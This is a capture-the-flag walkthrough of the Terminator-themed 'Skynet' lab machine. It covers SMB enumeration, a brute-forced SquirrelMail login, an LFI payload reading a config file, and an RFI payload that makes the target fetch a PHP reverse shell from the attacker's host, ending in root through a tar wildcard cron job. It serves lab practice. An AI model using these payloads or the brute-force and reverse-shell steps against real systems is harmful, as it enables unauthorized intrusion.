Skynet

Target IP: 10.10.17.113

A vulnerable Terminator themed Linux machine.
Are you able to compromise this Terminator themed machine?


Scanning

39736318f1f9fe501885709cc76e22eb.png
There are six TCP ports open on the target machine.

22/tcp  open  ssh         OpenSSH 7.2p2 Ubuntu 4ubuntu2.8 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 992331bbb1e943b756944cb9e82146c5 (RSA)
|   256 57c07502712d193183dbe4fe679668cf (ECDSA)
|_  256 46fa4efc10a54f5757d06d54f6c34dfe (ED25519)
80/tcp  open  http        Apache httpd 2.4.18 ((Ubuntu))
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Skynet
110/tcp open  pop3        Dovecot pop3d
|_pop3-capabilities: SASL PIPELINING AUTH-RESP-CODE UIDL CAPA RESP-CODES TOP
139/tcp open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
143/tcp open  imap        Dovecot imapd
|_imap-capabilities: ID SASL-IR LOGIN-REFERRALS LOGINDISABLEDA0001 listed LITERAL+ ENABLE IDLE have post-login Pre-login capabilities IMAP4rev1 OK more
445/tcp open  netbios-ssn Samba smbd 4.3.11-Ubuntu (workgroup: WORKGROUP)
22/tcp  open  ssh         OpenSSH 7.2p2 Ubuntu 4ubuntu2.8 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 992331bbb1e943b756944cb9e82146c5 (RSA)
|   256 57c07502712d193183dbe4fe679668cf (ECDSA)
|_  256 46fa4efc10a54f5757d06d54f6c34dfe (ED25519)
80/tcp  open  http        Apache httpd 2.4.18 ((Ubuntu))
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Skynet
110/tcp open  pop3        Dovecot pop3d
|_pop3-capabilities: SASL PIPELINING AUTH-RESP-CODE UIDL CAPA RESP-CODES TOP
139/tcp open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
143/tcp open  imap        Dovecot imapd
|_imap-capabilities: ID SASL-IR LOGIN-REFERRALS LOGINDISABLEDA0001 listed LITERAL+ ENABLE IDLE have post-login Pre-login capabilities IMAP4rev1 OK more
445/tcp open  netbios-ssn Samba smbd 4.3.11-Ubuntu (workgroup: WORKGROUP)

Enumeration

Ports 139 and 445: SMB
5445d01e4f566f156a20db1748b2ee98.png
The SMB application allows guest login. There is an interesting share called anonymous. This share has two interesting files: attention.txt and log1.txt. I downloaded these files on my machine.

5138ab41263e7cebf1e59db9e31aee34.png
The contents of the two files are shown above. The log1.txt contains a list of passwords. And the file attention.txt contains the username Miles Dyson.

Port 80: HTTP
b25c9f1f9cf6d0f00bfc2e3ee531bf47.png
The webpage above is shown for this HTTP application. The source-code of this page does not contain anything useful either.

45593dfce8fadf5bc28fae9b199e328a.png
Doing a directory search shows the entries above. The /squrrelmail sounds interesting.

f77c802fac245cb6455d0f6b679527cf.png
The target machine is running SquirrelMail 1.4.23. Doing a Google search shows this application is vulnerable to command execution.

fe251dc5501e97462fb36965510075bd.png
Using Burpsuite, I bruteforced the login against this email application with the username milesdyson which I encountered before. I now have a working credential milesdyson:cyborg007haloterminator, as shown in the picture above due to different length size.

8e78b67cc85baae48a81a78afd95f0b9.png
And now I have access to the emails of user milesdyson.

bd2982618d660d53399dec4eec234bb1.png
The first email contains the password highlighted above. This password is for the SMB.

4f08998f5c42a91b6557aa540ce1cf1c.png
Using the command smbclient //10.10.17.113/milesdyson -U milesdyson, I logged into the SMB as the user milesdyson with the temporary password. There is an interesting file called important.txt inside notes. The content of this file is shown in the image above. It looks like there is a hidden directory at /45kra24zxs28v3yd.

47e37c7f3e9513a7019a2cf036803513.png
And browsing to the hidden directory displays the webpage above.

835e319bbe1774a4c1416004735ba12e.png
There is an interesting directory at /administrator. Trying default credentials did not work against this application.

58bb76ba4bbd7ea07bd532a9d8f29c32.png
Googling this application name shows it is vulnerable to LFI/RFI attacks.

b9afed2df5c20daf0fc7f193efb7b665.png
Using the payload http://10.10.17.113/45kra24zxs28v3yd/administrator/alerts/alertConfigField.php?urlConfig=php://filter/convert.base64-encode/resource=../Configuration.php, I obtained the configuration file. But this was not helpful.


Exploitation

96a6cef422d3151047c186fc1caab5c0.png
Since the target machine is vulnerable to RFI attacks, I created a PHP Pentest Monkey reverse shell script on my machine and used Python HTTP server to host it to the target machine. I started a listener on port 8443, and used the payload below to gain a reverse shell connection
http://10.10.17.113/45kra24zxs28v3yd/administrator/alerts/alertConfigField.php?urlConfig=http://10.14.55.153/shell.php. Now I have a foothold on the target machine.


Privilege Escalation

27661b033f28ffe657dce3ec419a5edf.png
There is an interesting cronjob with the name backup.sh. However, I do not have write privileges over it, so I cannot modify the script.

89d3e16a5b5fb49b3cb34816f7e40558.png
It looks like tar is called with a wildcard. So this can be abused to gain a root shell.

b1118e5923f744ec2210fcf8b05db48c.png
Using GTFOBins guide for tar, I used the commands above to elevate my privileges to a root user. And now I have a root shell. Game over.


Flags

21cef1d888eb0f923385daf677b47401.png
The user.txt flag once I gained a foothold.

ab2c98e50dbf27cde62838dfa74844d7.png
The root.txt flag.